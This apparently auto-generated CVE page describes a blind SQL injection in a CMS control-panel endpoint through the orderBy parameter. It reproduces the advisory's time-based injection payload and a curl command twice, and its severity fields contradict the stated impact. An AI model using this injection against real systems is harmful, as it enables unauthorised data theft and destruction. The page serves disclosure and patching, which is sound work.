What is CVE-2026-25495?

## Summary The `element-indexes/get-elements` endpoint is vulnerable to **SQL Injection** via the `criteria[orderBy]` parameter (JSON body). The application fails to sanitize this input before using it in the database query. An attacker with **Control Panel access** can inject arbitrary SQL into the `ORDER BY` clause by omitting `viewState[order]` (or setting both to the same payload). > [!NOTE] > The `ORDER BY` clause executes per row. `SLEEP(1)` on 10 rows = 10s delay. --- ## PoC ### Required Permissions - Access to the Control Panel ### Steps to reproduce 1. Log in to the control panel 2. Navigate to any element index (e.g., **Users** `/admin/users`, **Entries**, **Assets**, etc.) 3. Intercept the `POST` request to `/index.php?p=admin/actions/element-indexes/get-elements` 4. Modify the JSON body to the following: ```json {"context":"index","elementType":"craft\\elements\\User","source":"*","baseCriteria":{"siteId":1},"criteria":{"limit":100,"orderBy": "(elements.id) DESC, (SELECT SLEEP(5)) --"},"viewState":{"static":false}} ``` 5. Send the request 6. Observe a delay in the response (delay = rows × sleep time) Alternatively, you can use the following `curl` (bash syntax) command (replace cookie, CSRF token, and target domain as needed): ```bash curl --path-as-is -k -X $'POST' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0' -H $'Accept: application/json' -H $'Content-Type: application/json' -H $'X-CSRF-Token: ' -H $'Content-Length: 208' -b $' ' --data-binary $'{\"context\":\"index\",\"elementType\":\"craft\\\\elements\\\\User\",\"source\":\"*\",\"baseCriteria\":{\"siteId\":1},\"criteria\":{\"limit\":100,\"orderBy\": \"(elements.id) DESC, (SELECT SLEEP(0.2)) --\"},\"viewState\":{\"static\":false}}' $'http://craft.local/index.php?p=admin%2Factions%2Felement-indexes%2Fget-elements' ``` ### Impact With this Blind SQLi, an attacker can: - **Exfiltrate data** character-by-character. - **Modify or destroy data** (drop tables, update records, alter schema). ### Root Cause The `orderBy` parameter is not validated or sanitized. Wrapping the payload in parentheses (e.g., `(elements.id)`) bypasses internal quoting mechanisms.

What is the severity of CVE-2026-25495?

CVE-2026-25495 has a CVSS v3 score of 0, which is classified as Low severity.

Is there an exploit available for CVE-2026-25495?

No known public exploits are currently available for CVE-2026-25495.

Is there a patch available for CVE-2026-25495?

Yes, patches are available for CVE-2026-25495. Check the vendor advisories for update instructions.

CVE-2026-25495 - CVE Details, Severity, and Analysis

Severity Scores

CVSS v30.0

CVSS v20.0

Priority Score0.0

EPSS Score0.0

None

Exploitation LikelihoodMinimal

0.00%EPSS

Very low probability of exploitation

Monitor and patch as resources allow

0.00%

EPSS

0.0

CVSS

No

Exploit

Yes

Patch

Low Priority

no major risk factors

EPSS predicts the probability of exploitation in the next 30 days based on real-world threat data, complementing CVSS severity scores with actual risk assessment.

Description

Summary

The element-indexes/get-elements endpoint is vulnerable to SQL Injection via the criteria[orderBy] parameter (JSON body). The application fails to sanitize this input before using it in the database query. An attacker with Control Panel access can inject arbitrary SQL into the ORDER BY clause by omitting viewState[order] (or setting both to the same payload).

[!NOTE] The ORDER BY clause executes per row. SLEEP(1) on 10 rows = 10s delay.

PoC

Required Permissions

Access to the Control Panel

Steps to reproduce

Log in to the control panel
Navigate to any element index (e.g., Users /admin/users, Entries, Assets, etc.)
Intercept the POST request to /index.php?p=admin/actions/element-indexes/get-elements
Modify the JSON body to the following:

{"context":"index","elementType":"craft\\elements\\User","source":"*","baseCriteria":{"siteId":1},"criteria":{"limit":100,"orderBy": "(elements.id) DESC, (SELECT SLEEP(5)) --"},"viewState":{"static":false}}

Send the request
Observe a delay in the response (delay = rows × sleep time)

Alternatively, you can use the following curl (bash syntax) command (replace cookie, CSRF token, and target domain as needed):

curl --path-as-is -k -X $'POST' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0' -H $'Accept: application/json' -H $'Content-Type: application/json' -H $'X-CSRF-Token: <CSRF-TOKEN>' -H $'Content-Length: 208' -b $'<Cookie>' --data-binary $'{\"context\":\"index\",\"elementType\":\"craft\\\\elements\\\\User\",\"source\":\"*\",\"baseCriteria\":{\"siteId\":1},\"criteria\":{\"limit\":100,\"orderBy\": \"(elements.id) DESC, (SELECT SLEEP(0.2)) --\"},\"viewState\":{\"static\":false}}' $'http://craft.local/index.php?p=admin%2Factions%2Felement-indexes%2Fget-elements'

CVSS v3 Breakdown

Attack Vector:-

Attack Complexity:-

Privileges Required:-

User Interaction:-

Scope:-

Confidentiality:-

Integrity:-

Availability:-

Patch References

Github.com Github.com Github.com